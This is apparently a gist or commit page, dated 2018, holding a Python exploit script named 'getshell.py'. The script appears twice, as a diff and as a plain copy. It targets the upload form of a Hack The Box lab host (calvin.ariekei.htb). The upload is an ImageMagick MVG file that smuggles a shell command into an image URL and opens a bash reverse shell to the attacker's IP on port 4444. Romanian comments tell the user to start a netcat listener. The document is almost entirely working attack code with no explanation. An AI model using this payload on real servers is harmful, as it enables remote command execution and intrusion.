unbaiat · January 15, 2018 18:18
diff --git a/getshell.py b/getshell.py
 #!/usr/bin/python
 import os
 import netifaces as ni
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

 ni.ifaddresses('tun0')
 ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']
 print "Te-ai legat la cap cu " + ip
 print "da si tu un nc pe 4444"

 try:
 	burp0_url = "https://calvin.ariekei.htb:443/upload"
 	burp0_headers = {"User-Agent": "SambaFlorilor", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://calvin.ariekei.htb/upload", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------12476729441075414381572117661"}
 	burp0_data="-----------------------------12476729441075414381572117661\r\nContent-Disposition: form-data; name=\"file\"; filename=\"imagik.mvg\"\r\nContent-Type: application/octet-stream\r\n\r\npush graphic-context \nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"|mknod /tmp/pipez p;bash -i >& /dev/tcp/%s/4444 0>&1;rm -rf \"/tmp/pipez)'\npop graphic-context\n\n\r\n-----------------------------12476729441075414381572117661--\r\n"%(ip)
 	requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

 except KeyboardInterrupt:
 	print "[+] Vine, vine bautura!\n "
 	print "[+] Doamne'ajuta!"
	#!/usr/bin/python
	import os
	import netifaces as ni
	import requests
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

	ni.ifaddresses('tun0')
	ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']
	print "Te-ai legat la cap cu " + ip
	print "da si tu un nc pe 4444"

	try:
	burp0_url = "https://calvin.ariekei.htb:443/upload"
	burp0_headers = {"User-Agent": "SambaFlorilor", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://calvin.ariekei.htb/upload", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------12476729441075414381572117661"}
	burp0_data="-----------------------------12476729441075414381572117661\r\nContent-Disposition: form-data; name=\"file\"; filename=\"imagik.mvg\"\r\nContent-Type: application/octet-stream\r\n\r\npush graphic-context \nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"\|mknod /tmp/pipez p;bash -i >& /dev/tcp/%s/4444 0>&1;rm -rf \"/tmp/pipez)'\npop graphic-context\n\n\r\n-----------------------------12476729441075414381572117661--\r\n"%(ip)
	requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

	except KeyboardInterrupt:
	print "[+] Vine, vine bautura!\n "
	print "[+] Doamne'ajuta!"